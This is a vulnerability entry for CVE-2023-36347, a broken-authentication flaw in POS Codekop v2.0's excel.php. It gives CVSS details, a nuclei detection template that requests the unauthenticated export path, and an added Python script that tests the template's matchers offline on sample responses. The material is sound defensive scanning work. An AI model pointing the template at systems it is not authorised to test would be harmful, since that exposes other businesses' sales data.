NUCLEI:CVE-2023-36347

POS Codekop v2.0 - Broken Authentication

Published: 2024-05-13 03:43:34 (ProjectDiscovery, github.com)

Tags: cve, cve2023, codekop, pos, auth-bypass, excel, download, authentication, unauthorized-access, remediation, session-management

CVSS3: 7.5 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS: 0.015 (Low), percentile 86.9%

A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
id: CVE-2023-36347

info:
  name: POS Codekop v2.0 - Broken Authentication
  author: princechaddha
  severity: high
  description: |
    A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive information.
  remediation: |
    Implement proper authentication mechanisms and ensure secure user session management.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-36347
    cwe-id: CWE-306
    epss-score: 0.01502
    epss-percentile: 0.86929
    cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: codekop
    product: codekop
  tags: cve,cve2023,codekop,pos,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/excel.php"
      - "{{BaseURL}}/pos-kasir-php/excel.php"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Document"

      - type: word
        part: header
        words:
          - "application/vnd.ms-excel"
# digest: 4b0a00483046022100f40c2a82acd274bf0a12dd8ee05b0b119d3c8e9af5d8b045f2415c041b1be7810221009dca8bf6565170469423bd5b8781eab18af6d4d0d6ffbb58d4d519cfe3f484f3:922c64590222798bb761d5b6d8e72950
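The template above decides a hit only when both `word` matchers fire (`matchers-condition: and`): the body must contain the `<title>Document` fragment and a response header must carry `application/vnd.ms-excel`. The following Python is an added example, not part of the nuclei template or ProjectDiscovery's code; it re-implements that matcher evaluation offline against constructed sample responses so the logic can be checked without touching a live host. The `Response` class, the three sample responses and the header-flattening rule are assumptions made for illustration.

```python
"""Offline evaluation of the CVE-2023-36347 template matchers.

Added example: mirrors the two `word` matchers and `matchers-condition: and`
from the template on this page. Sample responses are constructed, not captured.
"""
from dataclasses import dataclass


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (assumed shape, not nuclei's)."""
    status: int
    headers: dict  # header name -> value
    body: str


# Matchers copied verbatim from the template's `matchers:` block.
MATCHERS = [
    {"type": "word", "part": "body", "words": ["<title>Document"]},
    {"type": "word", "part": "header", "words": ["application/vnd.ms-excel"]},
]
MATCHERS_CONDITION = "and"  # template: matchers-condition: and


def part_text(resp: Response, part: str) -> str:
    """Return the text a matcher's `part` refers to.

    Headers are flattened to `Name: value` lines (assumption made here so a
    substring search over them behaves like nuclei's header matching).
    """
    if part == "body":
        return resp.body
    if part == "header":
        return "\n".join(f"{k}: {v}" for k, v in resp.headers.items())
    if part == "all":
        return part_text(resp, "header") + "\n\n" + resp.body
    raise ValueError(f"unsupported part: {part}")


def word_matcher_hits(resp: Response, matcher: dict) -> bool:
    """Evaluate one `word` matcher; nuclei defaults `condition` to `or`."""
    text = part_text(resp, matcher["part"])
    hits = [w in text for w in matcher["words"]]
    return all(hits) if matcher.get("condition", "or") == "and" else any(hits)


def template_matches(resp: Response) -> bool:
    """Combine all matchers under the template's matchers-condition."""
    results = [word_matcher_hits(resp, m) for m in MATCHERS]
    return all(results) if MATCHERS_CONDITION == "and" else any(results)


# Constructed sample responses (not real captures).
# 1. Unauthenticated request answered with the spreadsheet export: hit.
VULNERABLE = Response(
    status=200,
    headers={"Content-Type": "application/vnd.ms-excel",
             "Content-Disposition": "attachment; filename=data.xls"},
    body="<html><head><title>Document</title></head><body><table></table></body></html>",
)
# 2. Endpoint guarded by a login check that redirects: no hit.
PATCHED = Response(
    status=302,
    headers={"Location": "/login.php", "Content-Type": "text/html"},
    body="",
)
# 3. Same title but served as plain HTML: the header matcher fails, so no hit.
HTML_ONLY = Response(
    status=200,
    headers={"Content-Type": "text/html"},
    body="<title>Document</title>",
)


if __name__ == "__main__":
    for name, resp in [("vulnerable", VULNERABLE), ("patched", PATCHED),
                       ("html-only", HTML_ONLY)]:
        print(f"{name}: match={template_matches(resp)}")
```

The third sample is the one worth keeping in mind when tuning or reviewing this template: a page that merely contains `<title>Document` does not trigger it, because the `and` condition requires the Excel content type as well, which is what keeps the false-positive rate down on generic PHP front ends.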

